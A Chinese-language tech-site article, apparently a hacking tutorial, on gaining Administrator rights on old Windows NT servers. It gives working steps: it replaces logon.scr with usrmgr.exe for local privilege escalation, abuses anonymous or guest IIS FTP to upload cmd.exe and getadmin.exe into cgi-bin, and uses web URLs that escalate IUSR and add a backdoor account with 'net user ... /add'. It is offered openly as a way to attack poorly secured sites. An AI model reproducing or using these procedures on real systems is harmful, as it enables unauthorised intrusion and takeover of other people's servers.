学院首页 软件应用 编程开发 创意设计 认证培训 软件论坛
操作系统 杀毒防黑 聊天软件 网络软件 应用软件 

您的位置:学院 >> 软件应用 >> 操作系统 >> 看来Administrastor账户真的不安全


看来Administrastor账户真的不安全


    如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

    先把c:\winnt\system32下的logon.scr改名为logon.old备份

    然后把usrmgr.exe改名为logon.scr

    然后重新启动

    logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器。

    这时他就有权限把自己加到Administrator组

    不要忘记把文件名改回来啊!

    之二:

    下面的技术适用于不重视NT网络安全的网站,

    一些 hTtp的技术也可以供较高级的人员参考

    进入NT网络可以采取下面的步骤:

    因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

    正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

    ftp www.xxx.com

    ConNECted to www.xxx.com

    ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。

    User (www.xxx.comnone)):anonymous

    Password: 输入 guest@ 或者guest

    对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组。

    在这种情况下我们就可以进NT server的ftp了。

    进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。

    现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

    把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

    然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

    大约十多秒后屏幕显示:

    CGI Error

    这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

    下面可以add user:

    http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

    这样就创建了一个叫china用户,密码是news,然后:

    http://www.xxx.com/cgi-bin/getadmin.exe?china

    或者

    http://www.xxx.com/scripts/tools/getadmin.exe?china

    你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录。

技术文章快速查找

栏目导航
软件应用
·操作系统 ·杀毒防黑 ·应用软件
·聊天软件 ·网络软件  
Web开发
·ASP ·JavaScript ·CGI
·JSP ·VbScript ·Web服务器
·PHP ·XML  
开发语言
·VB ·VC ·ASP.NET
·Java ·C/C++ ·Delphi
数据库开发
·MySQL ·SQL/Access ·PowerBuilder
·Oracle ·DB2  
网站设计
·Flash ·Dreamweaver ·HTML/CSS
·Fireworks ·FrontPage  
平面设计
·Photoshop ·CorelDraw ·AutoCAD
·FreeHand ·Illustrator ·3DsMAX
媒体动画
·Director ·Authorware ·Maya
·视频处理    


相关软件 产品库推荐
·笔记本 ·台式机 ·服务器
·数码相机 ·手机 ·GPS
·DV摄像机 ·MP3 ·MP4
·CPU ·硬盘 ·内存
·主板 ·显卡 ·显示器
·打印机 ·投影机 ·路由器

还没人留言,抢个先,哈哈!
对"看来Administrastor账户真的不安全"的评论 - 快速回贴
内容:
  [完成后可按Ctrl+Enter发布]

百度中 看来Administrastor账户真的不安全 相关内容
Google搜索中 看来Administrastor账户真的不安全 相关内容
雅虎中 看来Administrastor账户真的不安全 相关内容
Sogou搜索中 看来Administrastor账户真的不安全 相关内容

相关软件 最新回复帖子:

·Windows Vista 中卸载软件的不同方式
·没有mysql支持时的替代方案
·一个可以发送附件及HTML格式邮件的PHP类
·AutoCAD打造精致三维鸟笼实例详解
·Photoshop自定义水晶字特效样式
·AutoCAD三维基础实例教程
·PS为黑背景长发美女照片抠图换背
·用Photoshop自制个性摩托车贴花小经验
·轻松几步将美女照片处理为手工素描
·巧用Photoshop画笔轻松绘制创意特效


  相关软件 看来Administrastor账户真的不安全相关文章
8年经典 Windows98/ME今天寿终正寝 低配玩家有福 Vista将不再"惨不忍睹"
非主流配置的WinVista5456极致优化 Windows系统美化:走向极端好色潮流
让你的C盘快起来 揪出占据硬盘的凶手 如何把系统主题集成到WinXP安装盘内
破解Windows XP组策略的 微软修改Win Vista系统性能评分工具
浅谈Windows系统多重启动的重要文件 匪夷所思 Windows安全隐患=特性?
谈谈购买Vista的十大理由及放弃原因 从95到Vista 了解Windows任务切换功能
比XP做得更好:寻找Win Vista 漏洞 Win Vista新特性:全部保护内核安全
为平民愤 微软终放弃WinXP反盗版工具 SATA串口硬盘WinVista驱动安装实录
WindowsXP操作系统镜像制作技巧放送 网友必备 读懂Windows虚拟内存问题
辉煌20年 微软Windows客户端产品大事记 五年之痒 WindowsXP组件“改换门庭”